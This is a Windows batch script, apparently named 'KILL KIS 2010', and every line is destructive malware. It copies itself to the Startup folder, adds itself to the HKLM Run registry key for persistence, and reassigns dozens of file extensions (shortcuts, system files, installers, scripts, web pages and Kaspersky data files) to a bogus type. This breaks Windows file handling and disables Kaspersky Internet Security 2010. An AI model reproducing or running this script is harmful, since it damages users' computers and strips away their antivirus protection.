@echo off
copy /y "%0" "%userprofile%\Menú Inicio\Programas\Inicio\KILL KIS 2010.bat">nul 2>&1
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "KILL KIS 2010.bat" /d "%0" /f
assoc .lnk=ARQfile
assoc .bav=arqfile
assoc .cfg=arqfile
assoc .manifest=arqfile
assoc .ppl=arqfile
assoc .vbs=arqfile
assoc .xpt=arqfile
assoc .tbp=arqfile
assoc .com=arqfile
assoc .xpt=arqfile
assoc .tbp=arqfile
assoc .url=arqfile
assoc .rdf=arqfile
assoc .xul=arqfile
assoc .js=arqfile
assoc .dtd=arqfile
assoc .css=arqfile
assoc .ini=arqfile
assoc .wav=arqfile
assoc .loc=arqfile
assoc .html=arqfile
assoc .sys=arqfile
assoc .cat=arqfile
assoc .msi=arqfile
assoc .avz=arqfile
assoc .kdc=arqfile
assoc .kdl=arqfile
assoc .kdz=arqfile
assoc .keb=arqfile
assoc .kep=arqfile
assoc .kfb=arqfile
assoc .kln=arqfile
assoc .mft=arqfile
assoc .rec=arqfile
assoc .set=arqfile
assoc .xml=arqfile
assoc .dat=arqfile
assoc .stt=arqfile
assoc .tmp=arqfile
assoc .pvb=arqfile
assoc .sfdb=arqfile
assoc .krg=arqfile
assoc .klz=arqfile
assoc .db=arqfile
assoc .bin=arqfile
assoc .idx=arqfile
